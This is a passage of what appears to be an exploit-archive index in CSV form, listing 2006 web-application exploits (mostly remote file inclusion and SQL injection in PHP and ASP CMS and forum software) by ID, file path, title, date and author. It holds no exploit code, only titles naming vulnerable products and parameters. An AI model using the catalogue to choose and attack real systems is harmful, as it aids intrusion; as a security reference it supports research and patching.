'phpBB' Remote File Inclusion",2006-05-12,"Kurdish Security",php,webapps, -1779,exploits/php/webapps/1779.txt,"PHP Blue Dragon CMS 2.9 - Remote File Inclusion",2006-05-12,Kacper,php,webapps, -1780,exploits/php/webapps/1780.php,"phpBB 2.0.20 - Admin/Restore DB/default_lang Remote Command Execution",2006-05-13,rgod,php,webapps, -1785,exploits/php/webapps/1785.php,"Sugar Suite Open Source 4.2 - 'OptimisticLock' Command Execution",2006-05-14,rgod,php,webapps, -1789,exploits/php/webapps/1789.txt,"TR Newsportal 0.36tr1 - 'poll.php' Remote File Inclusion",2006-05-15,Kacper,php,webapps, -1790,exploits/php/webapps/1790.txt,"Squirrelcart 2.2.0 - 'cart_content.php' Remote File Inclusion",2006-05-15,OLiBekaS,php,webapps, -1793,exploits/php/webapps/1793.pl,"DeluxeBB 1.06 - 'name' SQL Injection (mq=off)",2006-05-15,KingOfSka,php,webapps, -1795,exploits/php/webapps/1795.txt,"ezusermanager 1.6 - Remote File Inclusion",2006-05-15,OLiBekaS,php,webapps, -1796,exploits/php/webapps/1796.php,"PHP-Fusion 6.00.306 - 'srch_where' SQL Injection",2006-05-16,rgod,php,webapps, -1797,exploits/php/webapps/1797.php,"DeluxeBB 1.06 - 'Attachment mod_mime' Remote Command Execution",2006-05-16,rgod,php,webapps, -1798,exploits/php/webapps/1798.txt,"Quezza BB 1.0 - 'quezza_root_path' File Inclusion",2006-05-17,nukedx,php,webapps, -1800,exploits/php/webapps/1800.txt,"ScozNews 1.2.1 - 'mainpath' Remote File Inclusion",2006-05-17,Kacper,php,webapps, -1804,exploits/php/webapps/1804.txt,"phpBazar 2.1.0 - Remote File Inclusion / Authentication Bypass",2006-05-19,[Oo],php,webapps, -1805,exploits/php/webapps/1805.pl,"phpListPro 2.0.1 - 'Language' Remote Code Execution",2006-05-19,[Oo],php,webapps, -1807,exploits/asp/webapps/1807.txt,"Zix Forum 1.12 - 'layid' SQL Injection",2006-05-19,FarhadKey,asp,webapps, -1808,exploits/php/webapps/1808.txt,"phpMyDirectory 10.4.4 - 'ROOT_PATH' Remote File Inclusion",2006-05-19,OLiBekaS,php,webapps, -1809,exploits/php/webapps/1809.txt,"CaLogic Calendars 1.2.2 - 'CLPath' Remote File Inclusion",2006-05-20,Kacper,php,webapps, -1810,exploits/php/webapps/1810.pl,"Woltlab Burning Board 2.3.5 - 'links.php' SQL Injection",2006-05-20,666,php,webapps, -1811,exploits/php/webapps/1811.php,"XOOPS 2.0.13.2 - 'xoopsOption[nocommon]' Remote Command Execution",2006-05-21,rgod,php,webapps, -1812,exploits/php/webapps/1812.pl,"Fusion News 1.0 (fil_config) - Remote File Inclusion",2006-05-21,X0r_1,php,webapps, -1814,exploits/php/webapps/1814.txt,"UBBCentral UBB.Threads 6.4.x < 6.5.2 - 'thispath' Remote File Inclusion",2006-05-22,V4mu,php,webapps, -1816,exploits/php/webapps/1816.php,"Nucleus CMS 3.22 - 'DIR_LIBS' Remote File Inclusion",2006-05-23,rgod,php,webapps, -1817,exploits/php/webapps/1817.txt,"Docebo 3.0.3 - Multiple Remote File Inclusions",2006-05-23,Kacper,php,webapps, -1818,exploits/php/webapps/1818.txt,"phpCommunityCalendar 4.0.3 - Cross-Site Scripting / SQL Injection",2006-05-23,X0r_1,php,webapps, -1821,exploits/php/webapps/1821.php,"Drupal 4.7 - 'Attachment mod_mime' Remote Command Execution",2006-05-24,rgod,php,webapps, -1823,exploits/php/webapps/1823.txt,"BASE 1.2.4 - melissa Snort Frontend Remote File Inclusion",2006-05-25,str0ke,php,webapps, -1824,exploits/php/webapps/1824.txt,"open-medium.CMS 0.25 - '404.php' Remote File Inclusion",2006-05-25,Kacper,php,webapps, -1825,exploits/php/webapps/1825.txt,"Back-End CMS 0.7.2.2 - 'BE_config.php' Remote File Inclusion",2006-05-25,Kacper,php,webapps, -1826,exploits/php/webapps/1826.txt,"Socketmail 2.2.6 - 'site_path' Remote File Inclusion",2006-05-25,Aesthetico,php,webapps, -1827,exploits/php/webapps/1827.txt,"V-Webmail 1.6.4 - 'pear_dir' Remote File Inclusion",2006-05-25,beford,php,webapps, -1828,exploits/php/webapps/1828.txt,"DoceboLms 2.0.5 - 'help.php' Remote File Inclusion",2006-05-25,beford,php,webapps, -1829,exploits/php/webapps/1829.txt,"APC ActionApps CMS 2.8.1 - Remote File Inclusion",2006-05-25,Kacper,php,webapps, -1832,exploits/php/webapps/1832.txt,"Plume CMS 1.0.3 - 'manager_path' Remote File Inclusion",2006-05-26,beford,php,webapps, -1833,exploits/asp/webapps/1833.txt,"qjForum - 'member.asp' SQL Injection",2006-05-26,ajann,asp,webapps, -1834,exploits/asp/webapps/1834.asp,"Easy-Content Forums 1.0 - Multiple SQL Injection / Cross-Site Scripting Vulnerabilities",2006-05-26,ajann,asp,webapps, -1835,exploits/php/webapps/1835.txt,"Hot Open Tickets 11012004 - 'CLASS_PATH' Remote File Inclusion",2006-05-27,Kacper,php,webapps, -1836,exploits/asp/webapps/1836.txt,"PrideForum 1.0 - 'forum.asp' SQL Injection",2006-05-27,ajann,asp,webapps, -1837,exploits/asp/webapps/1837.pl,"MiniNuke 2.x - SQL Injection (Add Admin)",2006-05-27,nukedx,asp,webapps, -1839,exploits/php/webapps/1839.txt,"tinyBB 0.3 - Remote File Inclusion / SQL Injection",2006-05-28,nukedx,php,webapps, -1840,exploits/asp/webapps/1840.txt,"Enigma Haber 4.3 - Multiple SQL Injections",2006-05-28,nukedx,asp,webapps, -1841,exploits/php/webapps/1841.txt,"F@cile Interactive Web 0.8x - Remote File Inclusion / Cross-Site Scripting",2006-05-28,nukedx,php,webapps, -1842,exploits/php/webapps/1842.html,"EggBlog < 3.07 - Remote SQL Injection / Privilege Escalation",2006-05-28,nukedx,php,webapps, -1843,exploits/php/webapps/1843.txt,"UBBCentral UBB.Threads 5.x/6.x - Multiple Remote File Inclusions",2006-05-28,nukedx,php,webapps, -1844,exploits/php/webapps/1844.txt,"Activity MOD Plus 1.1.0 - 'phpBB Mod' File Inclusion",2006-05-28,nukedx,php,webapps, -1845,exploits/asp/webapps/1845.txt,"ASPSitem 2.0 - SQL Injection / Database Disclosure",2006-05-28,nukedx,asp,webapps, -1846,exploits/php/webapps/1846.txt,"Blend Portal 1.2.0 - 'phpBB Mod' Remote File Inclusion",2006-05-28,nukedx,php,webapps, -1847,exploits/php/webapps/1847.txt,"CosmicShoppingCart - 'search.php' SQL Injection",2006-05-28,Vympel,php,webapps, -1848,exploits/php/webapps/1848.txt,"Fastpublish CMS 1.6.9 - config[fsBase] Remote File Inclusion",2006-05-29,Kacper,php,webapps, -1849,exploits/asp/webapps/1849.html,"Speedy ASP Forum - 'profileupdate.asp' User Pass Change",2006-05-29,ajann,asp,webapps, -1850,exploits/asp/webapps/1850.html,"Nukedit 4.9.6 - Unauthorized Admin Add",2006-05-29,FarhadKey,asp,webapps, -1851,exploits/php/webapps/1851.txt,"gnopaste 0.5.3 - 'common.php' Remote File Inclusion",2006-05-30,SmokeZ,php,webapps, -1853,exploits/php/webapps/1853.php,"pppBlog 0.3.8 - System Disclosure",2006-05-31,rgod,php,webapps, -1854,exploits/php/webapps/1854.txt,"Ottoman CMS 1.1.3 - '?default_path=' Remote File Inclusion (1)",2006-05-31,Kacper,php,webapps, -1855,exploits/php/webapps/1855.txt,"metajour 2.1 - 'system_path' Remote File Inclusion",2006-05-31,Kacper,php,webapps, -1857,exploits/php/webapps/1857.pl,"TinyPHP Forum 3.6 - 'profile.php' Remote Code Execution",2006-06-01,Hessam-x,php,webapps, -1858,exploits/php/webapps/1858.txt,"AssoCIateD CMS 1.1.3 - 'ROOT_PATH' Remote File Inclusion",2006-06-01,Kacper,php,webapps, -1859,exploits/asp/webapps/1859.html,"aspWebLinks 2.0 - SQL Injection / Admin Pass Change",2006-06-01,ajann,asp,webapps, -1860,exploits/php/webapps/1860.txt,"Bytehoard 2.1 - 'server.php' Remote File Inclusion",2006-06-01,beford,php,webapps, -1861,exploits/php/webapps/1861.txt,"Redaxo 3.2 - 'INCLUDE_PATH' Remote File Inclusion",2006-06-02,beford,php,webapps, -1863,exploits/php/webapps/1863.txt,"Igloo 0.1.9 - 'Wiki.php' Remote File Inclusion",2006-06-02,Kacper,php,webapps, -1864,exploits/php/webapps/1864.txt,"ashNews 0.83 - 'pathtoashnews' Remote File Inclusion",2006-06-02,Kacper,php,webapps, -1865,exploits/php/webapps/1865.txt,"Informium 0.12.0 - 'common-menu.php' Remote File Inclusion",2006-06-02,Kacper,php,webapps, -1866,exploits/php/webapps/1866.txt,"PHP-Nuke 7.9 Final - 'phpbb_root_path' Remote File Inclusions",2006-06-02,ddoshomo,php,webapps, -1868,exploits/php/webapps/1868.php,"PixelPost 1-5rc1-2 - Privilege Escalation",2006-06-03,rgod,php,webapps, -1869,exploits/php/webapps/1869.php,"DotClear 1.2.4 - 'prepend.php' Remote File Inclusion",2006-06-03,rgod,php,webapps, -1870,exploits/php/webapps/1870.txt,"BlueShoes Framework 4.6 - Remote File Inclusion",2006-06-03,Kacper,php,webapps, -1871,exploits/php/webapps/1871.txt,"WebspotBlogging 3.0.1 - 'path' Remote File Inclusion",2006-06-03,Kacper,php,webapps, -1872,exploits/php/webapps/1872.txt,"CS-Cart 1.3.3 - 'classes_dir' Remote File Inclusion",2006-06-03,Kacper,php,webapps, -1873,exploits/asp/webapps/1873.txt,"ProPublish 2.0 - 'catid' SQL Injection",2006-06-03,FarhadKey,asp,webapps, -1874,exploits/php/webapps/1874.php,"LifeType 1.0.4 - SQL Injection",2006-06-03,rgod,php,webapps, -1875,exploits/php/webapps/1875.html,"FunkBoard CF0.71 - 'profile.php' Remote User Pass Change",2006-06-04,ajann,php,webapps, -1876,exploits/php/webapps/1876.pl,"SCart 2.0 - 'page' Remote Code Execution",2006-06-04,K-159,php,webapps, -1877,exploits/php/webapps/1877.php,"Claroline 1.7.6 - 'includePath' Remote Code Execution",2006-06-05,rgod,php,webapps, -1878,exploits/php/webapps/1878.txt,"Particle Wiki 1.0.2 - SQL Injection",2006-06-05,FarhadKey,php,webapps, -1879,exploits/php/webapps/1879.txt,"dotWidget CMS 1.0.6 - 'file_path' Remote File Inclusion",2006-06-05,Aesthetico,php,webapps, -1881,exploits/php/webapps/1881.txt,"DreamAccount 3.1 - 'da_path' Remote File Inclusion",2006-06-05,Aesthetico,php,webapps, -1882,exploits/php/webapps/1882.pl,"Dmx Forum 2.1a - 'edit.php' Remote Password Disclosure",2006-06-05,DarkFig,php,webapps, -1883,exploits/php/webapps/1883.txt,"Wikiwig 4.1 - 'wk_lang.php' Remote File Inclusion",2006-06-06,Kacper,php,webapps, -1884,exploits/asp/webapps/1884.html,"myNewsletter 1.1.2 - 'adminLogin.asp' Authentication Bypass",2006-06-06,FarhadKey,asp,webapps, -1886,exploits/php/webapps/1886.txt,"OpenEMR 2.8.1 - 'fileroot' Remote File Inclusion",2006-06-07,Kacper,php,webapps, -1887,exploits/php/webapps/1887.txt,"Xtreme/Ditto News 1.0 - 'post.php' Remote File Inclusion",2006-06-07,Kacper,php,webapps, -1888,exploits/php/webapps/1888.txt,"Back-End CMS 0.7.2.1 - 'jpcache.php' Remote File Inclusion",2006-06-08,"Federico Fazzi",php,webapps, -1890,exploits/php/webapps/1890.txt,"CMS-Bandits 2.5 - 'spaw_root' Remote File Inclusion",2006-06-08,"Federico Fazzi",php,webapps, -1891,exploits/php/webapps/1891.txt,"Enterprise Payroll Systems 1.1 - 'footer' Remote File Inclusion",2006-06-08,Kacper,php,webapps, -1892,exploits/php/webapps/1892.pl,"Guestex Guestbook 1.00 - 'email' Remote Code Execution",2006-06-08,K-sPecial,php,webapps, -1893,exploits/asp/webapps/1893.txt,"MailEnable Enterprise 2.0 - 'ASP' Multiple Vulnerabilities",2006-06-09,"Soroush Dalili",asp,webapps, -1895,exploits/php/webapps/1895.txt,"empris r20020923 - 'phormationdir' Remote File Inclusion",2006-06-10,Kacper,php,webapps, -1896,exploits/php/webapps/1896.txt,"aePartner 0.8.3 - 'dir[data]' Remote File Inclusion",2006-06-10,Kacper,php,webapps, -1897,exploits/php/webapps/1897.txt,"phpOnDirectory 1.0 - Remote File Inclusion",2006-06-10,Kacper,php,webapps, -1898,exploits/php/webapps/1898.txt,"WebprojectDB 0.1.3 - 'INCDIR' Remote File Inclusion",2006-06-11,Kacper,php,webapps, -1899,exploits/php/webapps/1899.txt,"free QBoard 1.1 - 'qb_path' Remote File Inclusion",2006-06-11,Kacper,php,webapps, -1900,exploits/asp/webapps/1900.txt,"MaxiSepet 1.0 - 'link' SQL Injection",2006-06-11,nukedx,asp,webapps, -1901,exploits/php/webapps/1901.pl,"RCblog 1.03 - 'POST' Remote Command Execution",2006-06-11,Hessam-x,php,webapps, -1902,exploits/php/webapps/1902.txt,"AWF CMS 1.11 - 'spaw_root' Remote File Inclusion",2006-06-11,"Federico Fazzi",php,webapps, -1903,exploits/php/webapps/1903.txt,"Content-Builder (CMS) 0.7.5 - Multiple Include Vulnerabilities",2006-06-11,"Federico Fazzi",php,webapps, -1904,exploits/php/webapps/1904.php,"blur6ex 0.3.462 - 'ID' Admin Disclosure / Blind SQL Injection",2006-06-12,rgod,php,webapps, -1905,exploits/php/webapps/1905.txt,"DCP-Portal 6.1.x - 'root' Remote File Inclusion",2006-06-12,"Federico Fazzi",php,webapps, -1907,exploits/php/webapps/1907.txt,"aWebNews 1.5 - 'visview.php' Remote File Inclusion",2006-06-13,SpC-x,php,webapps, -1908,exploits/php/webapps/1908.txt,"Minerva 2.0.8a Build 237 - 'phpbb_root_path' File Inclusion",2006-06-13,Kacper,php,webapps, -1909,exploits/php/webapps/1909.pl,"MyBulletinBoard (MyBB) < 1.1.3 - Remote Code Execution",2006-06-13,"Javier Olascoaga",php,webapps, -1912,exploits/php/webapps/1912.txt,"The Bible Portal Project 2.12 - 'destination' File Inclusion",2006-06-14,Kacper,php,webapps, -1913,exploits/php/webapps/1913.txt,"PHP Blue Dragon CMS 2.9.1 - 'template.php' File Inclusion",2006-06-14,"Federico Fazzi",php,webapps, -1914,exploits/php/webapps/1914.txt,"Content-Builder (CMS) 0.7.2 - Multiple Include Vulnerabilities",2006-06-14,Kacper,php,webapps, -1916,exploits/php/webapps/1916.txt,"DeluxeBB 1.06 - 'templatefolder' Remote File Inclusion",2006-06-15,"Andreas Sandblad",php,webapps, -1918,exploits/php/webapps/1918.php,"Bitweaver 1.3 - 'tmpImagePath' Attachment mod_mime",2006-06-15,rgod,php,webapps, -1919,exploits/php/webapps/1919.txt,"CMS Faethon 1.3.2 - 'mainpath' Remote File Inclusion",2006-06-16,K-159,php,webapps, -1920,exploits/php/webapps/1920.php,"Mambo 4.6rc1 - Weblinks Blind SQL Injection (1)",2006-06-17,rgod,php,webapps, -1921,exploits/php/webapps/1921.pl,"FlashBB 1.1.8 - 'phpbb_root_path' Remote File Inclusion",2006-06-17,h4ntu,php,webapps, -1922,exploits/php/webapps/1922.php,"Joomla! 1.0.9 - 'Weblinks' Blind SQL Injection",2006-06-17,rgod,php,webapps, -1923,exploits/php/webapps/1923.txt,"Ad Manager Pro 2.6 - 'ipath' Remote File Inclusion",2006-06-17,Basti,php,webapps, -1925,exploits/php/webapps/1925.txt,"Indexu 5.0.1 - 'admin_template_path' Remote File Inclusion",2006-06-18,CrAsh_oVeR_rIdE,php,webapps, -1926,exploits/php/webapps/1926.txt,"PHP Live Helper 1.x - 'abs_path' Remote File Inclusion",2006-06-18,SnIpEr_SA,php,webapps, -1928,exploits/php/webapps/1928.txt,"IdeaBox 1.1 - 'gorumDir' Remote File Inclusion",2006-06-19,Kacper,php,webapps, -1929,exploits/php/webapps/1929.txt,"Micro CMS 0.3.5 - 'microcms_path' Remote File Inclusion",2006-06-19,CeNGiZ-HaN,php,webapps, -1930,exploits/asp/webapps/1930.txt,"WeBBoA Host Script 1.1 - SQL Injection",2006-06-19,EntriKa,asp,webapps, -1931,exploits/asp/webapps/1931.txt,"ASP Stats Generator 2.1.1 - SQL Injection",2006-06-19,"Hamid Ebadi",asp,webapps, -1932,exploits/php/webapps/1932.php,"Ultimate PHP Board 1.96 GOLD - Multiple Vulnerabilities",2006-06-20,"Michael Brooks",php,webapps, -1933,exploits/php/webapps/1933.txt,"BandSite CMS 1.1.1 - 'ROOT_PATH' Remote File Inclusion",2006-06-20,Kw3[R]Ln,php,webapps, -1934,exploits/php/webapps/1934.txt,"dotProject 2.0.3 - 'baseDir' Remote File Inclusion",2006-06-20,h4ntu,php,webapps, -1936,exploits/php/webapps/1936.txt,"SmartSite CMS 1.0 - 'root' Remote File Inclusion",2006-06-20,Archit3ct,php,webapps, -1938,exploits/php/webapps/1938.pl,"DataLife Engine 4.1 - SQL Injection (Perl)",2006-06-21,RusH,php,webapps, -1939,exploits/php/webapps/1939.php,"DataLife Engine 4.1 - SQL Injection (PHP)",2006-06-21,RusH,php,webapps, -1941,exploits/php/webapps/1941.php,"Mambo 4.6rc1 - Weblinks Blind SQL Injection (2)",2006-06-22,rgod,php,webapps, -1942,exploits/php/webapps/1942.txt,"ralf image Gallery 0.7.4 - Multiple Vulnerabilities",2006-06-22,Aesthetico,php,webapps, -1943,exploits/php/webapps/1943.txt,"Harpia CMS 1.0.5 - Remote File Inclusion",2006-06-22,Kw3[R]Ln,php,webapps, -1945,exploits/php/webapps/1945.pl,"w-Agora 4.2.0 - 'inc_dir' Remote File Inclusion",2006-06-22,the_day,php,webapps, -1946,exploits/php/webapps/1946.php,"Jaws 0.6.2 - Search gadget SQL Injection",2006-06-23,rgod,php,webapps, -1948,exploits/php/webapps/1948.txt,"phpMySms 2.0 - 'ROOT_PATH' Remote File Inclusion",2006-06-24,Persian-Defacer,php,webapps, -1950,exploits/php/webapps/1950.pl,"MyBulletinBoard (MyBB) 1.1.3 - 'usercp.php' Create Admin",2006-06-25,Hessam-x,php,webapps, -1951,exploits/php/webapps/1951.txt,"MagNet BeeHive CMS (header) - Remote File Inclusion",2006-06-25,Kw3[R]Ln,php,webapps, -1952,exploits/php/webapps/1952.txt,"THoRCMS 1.3.1 - 'phpbb_root_path' Remote File Inclusion",2006-06-25,Kw3[R]Ln,php,webapps, -1953,exploits/php/webapps/1953.pl,"DeluxeBB 1.07 - Remote Create Admin",2006-06-25,Hessam-x,php,webapps, -1954,exploits/php/webapps/1954.pl,"DreamAccount 3.1 - 'auth.api.php' Remote File Inclusion",2006-06-25,CrAsh_oVeR_rIdE,php,webapps, -1955,exploits/php/webapps/1955.txt,"Mambo Module CBSms 1.0 - Remote File Inclusion",2006-06-26,Kw3[R]Ln,php,webapps, -1956,exploits/php/webapps/1956.txt,"Mambo Component Pearl 1.6 - Multiple Remote File Inclusions",2006-06-27,Kw3[R]Ln,php,webapps, -1957,exploits/php/webapps/1957.pl,"Scout Portal Toolkit 1.4.0 - 'forumid' SQL Injection",2006-06-27,simo64,php,webapps, -1959,exploits/php/webapps/1959.txt,"RsGallery2 < 1.11.2 - 'rsgallery.html.php' File Inclusion",2006-06-28,marriottvn,php,webapps, -1960,exploits/php/webapps/1960.php,"Blog:CMS 4.0.0k - SQL Injection",2006-06-28,rgod,php,webapps, -1961,exploits/php/webapps/1961.txt,"XOOPS myAds Module - 'lid' SQL Injection",2006-06-28,KeyCoder,php,webapps, -1963,exploits/php/webapps/1963.txt,"GeekLog 1.4.0sr3 - '_CONF[path]' Remote File Inclusion",2006-06-29,Kw3[R]Ln,php,webapps, -1964,exploits/php/webapps/1964.php,"GeekLog 1.4.0sr3 - 'f(u)ckeditor' Remote Code Execution",2006-06-29,rgod,php,webapps, -1968,exploits/php/webapps/1968.php,"DZCP (deV!L_z Clanportal) 1.34 - 'id' SQL Injection",2006-07-01,x128,php,webapps, -1969,exploits/php/webapps/1969.txt,"Stud.IP 1.3.0-2 - Multiple Remote File Inclusions",2006-07-01,"Hamid Ebadi",php,webapps, -1970,exploits/php/webapps/1970.txt,"Plume CMS 1.1.3 - 'dbinstall.php' Remote File Inclusion",2006-07-01,"Hamid Ebadi",php,webapps, -1971,exploits/php/webapps/1971.txt,"Randshop 1.1.1 - 'header.inc.php' Remote File Inclusion",2006-07-01,OLiBekaS,php,webapps, -1974,exploits/php/webapps/1974.txt,"SmartSite CMS 1.0 - 'root' Multiple Remote File Inclusions",2006-07-01,CrAsh_oVeR_rIdE,php,webapps, -1975,exploits/php/webapps/1975.pl,"BXCP 0.3.0.4 - 'where' SQL Injection",2006-07-02,x23,php,webapps, -1981,exploits/php/webapps/1981.txt,"Mambo Module galleria 1.0b - Remote File Inclusion",2006-07-04,sikunYuk,php,webapps, -1982,exploits/php/webapps/1982.txt,"WonderEdit Pro CMS (template_path) - Remote File Inclusion",2006-07-04,OLiBekaS,php,webapps, -1983,exploits/php/webapps/1983.txt,"MyPHP CMS 0.3 - 'domain' Remote File Inclusion",2006-07-05,Kw3[R]Ln,php,webapps, -1987,exploits/asp/webapps/1987.txt,"Hosting Controller 6.1 Hotfix 3.1 - Privilege Escalation",2006-07-06,"Soroush Dalili",asp,webapps, -1991,exploits/php/webapps/1991.php,"Pivot 1.30 RC2 - Privilege Escalation / Remote Code Execution",2006-07-07,rgod,php,webapps, -1993,exploits/php/webapps/1993.php,"PAPOO 3_RC3 - SQL Injection / Admin Credentials Disclosure",2006-07-07,rgod,php,webapps, -1994,exploits/php/webapps/1994.txt,"Mambo Component SimpleBoard 1.1.0 - Remote File Inclusion",2006-07-08,h4ntu,php,webapps, -1995,exploits/php/webapps/1995.txt,"Mambo Component com_forum 1.2.4RC3 - Remote File Inclusion",2006-07-08,h4ntu,php,webapps, -1996,exploits/php/webapps/1996.txt,"Sabdrimer PRO 2.2.4 - 'pluginpath' Remote File Inclusion",2006-07-09,A.nosrati,php,webapps, -1998,exploits/php/webapps/1998.pl,"Ottoman CMS 1.1.3 - '?default_path=' Remote File Inclusion (2)",2006-07-09,"Jacek Wlodarczyk",php,webapps, -2002,exploits/php/webapps/2002.pl,"EJ3 TOPo 2.2 - 'descripcion' Remote Command Execution",2006-07-10,Hessam-x,php,webapps, -2003,exploits/php/webapps/2003.txt,"SQuery 4.5 - 'gore.php' Remote File Inclusion",2006-07-10,SHiKaA,php,webapps, -2007,exploits/php/webapps/2007.php,"phpBB 3 - 'memberlist.php' SQL Injection",2006-07-13,rgod,php,webapps, -2008,exploits/php/webapps/2008.php,"Phorum 5 - 'pm.php' Arbitrary Local Inclusion",2006-07-13,rgod,php,webapps, -2009,exploits/php/webapps/2009.txt,"CzarNews 1.14 - 'tpath' Remote File Inclusion",2006-07-13,SHiKaA,php,webapps, -2010,exploits/php/webapps/2010.pl,"Invision Power Board 2.1 < 2.1.6 - SQL Injection (1)",2006-07-14,RusH,php,webapps, -2012,exploits/php/webapps/2012.php,"MyBulletinBoard (MyBB) 1.1.5 - 'CLIENT-IP' SQL Injection",2006-07-15,rgod,php,webapps, -2018,exploits/php/webapps/2018.txt,"FlushCMS 1.0.0-pre2 - 'class.rich.php' Remote File Inclusion",2006-07-16,igi,php,webapps, -2019,exploits/php/webapps/2019.txt,"mail2forum phpBB Mod 1.2 - 'm2f_root_path' Remote File Inclusion",2006-07-17,OLiBekaS,php,webapps, -2020,exploits/php/webapps/2020.txt,"Mambo Component com_videodb 0.3en - Remote File Inclusion",2006-07-17,h4ntu,php,webapps, -2021,exploits/php/webapps/2021.txt,"Mambo Component SMF Forum 1.3.1.3 - Remote File Inclusion",2006-07-17,ASIANEAGLE,php,webapps, -2022,exploits/php/webapps/2022.txt,"Mambo Component ExtCalendar 2.0 - Remote File Inclusion",2006-07-17,OLiBekaS,php,webapps, -2023,exploits/php/webapps/2023.txt,"Mambo Component com_loudmouth 4.0j - Remote File Inclusion",2006-07-17,h4ntu,php,webapps, -2024,exploits/php/webapps/2024.txt,"Mambo Component pc_cookbook 0.3 - Remote File Inclusion",2006-07-17,Matdhule,php,webapps, -2025,exploits/php/webapps/2025.txt,"Mambo Component perForms 1.0 - Remote File Inclusion",2006-07-17,endeneu,php,webapps, -2026,exploits/php/webapps/2026.txt,"Mambo Component com_hashcash 1.2.1 - Remote File Inclusion",2006-07-17,Matdhule,php,webapps, -2027,exploits/php/webapps/2027.txt,"Mambo Module HTMLArea3 1.5 - Remote File Inclusion",2006-07-17,Matdhule,php,webapps, -2028,exploits/php/webapps/2028.txt,"Mambo Component Sitemap 2.0.0 - Remote File Inclusion",2006-07-17,Matdhule,php,webapps, -2029,exploits/php/webapps/2029.txt,"Mambo Component pollxt 1.22.07 - Remote File Inclusion",2006-07-17,vitux,php,webapps, -2030,exploits/php/webapps/2030.txt,"Mambo Component MiniBB 1.5a - Remote File Inclusion",2006-07-17,Matdhule,php,webapps, -2032,exploits/php/webapps/2032.pl,"Eskolar CMS 0.9.0.0 - Blind SQL Injection",2006-07-18,"Jacek Wlodarczyk",php,webapps, -2033,exploits/php/webapps/2033.pl,"Invision Power Board 2.1 < 2.1.6 - SQL Injection (2)",2006-07-18,"w4g.not null",php,webapps, -2035,exploits/php/webapps/2035.php,"ToendaCMS 1.0.0 - 'FCKeditor' Arbitrary File Upload",2006-07-18,rgod,php,webapps, -2036,exploits/php/webapps/2036.txt,"PHP-Post 1.0 - Cookie Modification Privilege Escalation",2006-07-18,FarhadKey,php,webapps, -2046,exploits/php/webapps/2046.txt,"iManage CMS 4.0.12 - 'absolute_path' Remote File Inclusion",2006-07-20,Matdhule,php,webapps, -2049,exploits/php/webapps/2049.txt,"SiteDepth CMS 3.0.1 - 'SD_DIR' Remote File Inclusion",2006-07-20,Aesthetico,php,webapps, -2050,exploits/php/webapps/2050.php,"LoudBlog 0.5 - SQL Injection / Admin Credentials Disclosure",2006-07-21,rgod,php,webapps, -2058,exploits/php/webapps/2058.txt,"PHP Forge 3 Beta 2 - 'cfg_racine' Remote File Inclusion",2006-07-22,"Virangar Security",php,webapps, -2060,exploits/php/webapps/2060.txt,"PHP Live! 3.2.1 - 'help.php' Remote File Inclusion",2006-07-23,magnific,php,webapps, -2062,exploits/php/webapps/2062.txt,"Mambo Component MoSpray 18RC1 - Remote File Inclusion",2006-07-23,"Kurdish Security",php,webapps, -2063,exploits/php/webapps/2063.txt,"ArticlesOne 07232006 - 'page' Remote File Inclusion",2006-07-23,CyberLord,php,webapps, -2064,exploits/php/webapps/2064.txt,"Mambo Component Mam-Moodle alpha - Remote File Inclusion",2006-07-23,jank0,php,webapps, -2066,exploits/php/webapps/2066.txt,"Mambo Component multibanners 1.0.1 - Remote File Inclusion",2006-07-23,Blue|Spy,php,webapps, -2068,exploits/php/webapps/2068.php,"X7 Chat 2.0.4 - 'old_prefix' Blind SQL Injection",2006-07-24,rgod,php,webapps, -2069,exploits/php/webapps/2069.txt,"Mambo Component PrinceClan Chess 0.8 - Remote File Inclusion",2006-07-24,OLiBekaS,php,webapps, -2071,exploits/php/webapps/2071.php,"Etomite CMS 0.6.1 - 'Username' SQL Injection (mq = off)",2006-07-25,rgod,php,webapps, -2072,exploits/php/webapps/2072.php,"Etomite CMS 0.6.1 - 'rfiles.php' Remote Command Execution",2006-07-25,rgod,php,webapps, -2077,exploits/php/webapps/2077.txt,"WMNews 0.2a - 'base_datapath' Remote File Inclusion",2006-07-27,uNfz,php,webapps, -2078,exploits/php/webapps/2078.txt,"Mambo Component 'com_a6mambohelpdesk' 18RC1 - Remote File Inclusion",2006-07-27,Dr.Jr7,php,webapps, -2081,exploits/php/webapps/2081.txt,"Portail PHP 1.7 - 'chemin' Remote File Inclusion",2006-07-27,"Mehmet Ince",php,webapps, -2083,exploits/php/webapps/2083.txt,"Mambo Component Security Images 3.0.5 - Remote File Inclusion",2006-07-28,Drago84,php,webapps, -2084,exploits/php/webapps/2084.txt,"Mambo Component MGM 0.95r2 - Remote File Inclusion",2006-07-28,"A-S-T TEAM",php,webapps, -2085,exploits/php/webapps/2085.txt,"Mambo Component 'com_colophon' 1.2 - Remote File Inclusion",2006-07-29,Drago84,php,webapps, -2086,exploits/php/webapps/2086.txt,"Mambo Component mambatStaff 3.1b - Remote File Inclusion",2006-07-29,Dr.Jr7,php,webapps, -2087,exploits/php/webapps/2087.php,"vbPortal 3.0.2 < 3.6.0 b1 - 'cookie' Remote Code Execution",2006-07-29,r00t,php,webapps, -2088,exploits/php/webapps/2088.php,"ATutor 1.5.3.1 - 'links' Blind SQL Injection",2006-07-30,rgod,php,webapps, -2089,exploits/php/webapps/2089.txt,"Mambo Component User Home Pages 0.5 - Remote File Inclusion",2006-07-30,"Kurdish Security",php,webapps, -2090,exploits/php/webapps/2090.txt,"Joomla! Component com_bayesiannaivefilter 1.1 - Remote File Inclusion",2006-07-30,Pablin77,php,webapps, -2092,exploits/php/webapps/2092.txt,"Joomla! Component LMO 1.0b2 - Remote File Inclusion",2006-07-30,vitux,php,webapps, -2095,exploits/php/webapps/2095.txt,"PhpReactor 1.2.7pl1 - 'pathtohomedir' Remote File Inclusion",2006-07-31,CeNGiZ-HaN,php,webapps, -2096,exploits/php/webapps/2096.txt,"MyNewsGroups 0.6b - 'myng_root' Remote Inclusion",2006-07-31,"Philipp Niedziela",php,webapps, -2097,exploits/php/webapps/2097.txt,"NewsLetter 3.5 - 'NL_PATH' Remote File Inclusion",2006-08-01,SHiKaA,php,webapps, -2098,exploits/php/webapps/2098.txt,"TSEP 0.942 - 'copyright.php' Remote File Inclusion",2006-08-01,"Philipp Niedziela",php,webapps, -2099,exploits/php/webapps/2099.txt,"WoW Roster 1.5.1 - 'subdir' Remote File Inclusion",2006-08-01,skulmatic,php,webapps, -2100,exploits/php/webapps/2100.txt,"phpAuction 2.1 - 'phpAds_path' Remote File Inclusion",2006-08-01,"Philipp Niedziela",php,webapps, -2101,exploits/php/webapps/2101.txt,"newsReporter 1.1 - 'index.php' Remote File 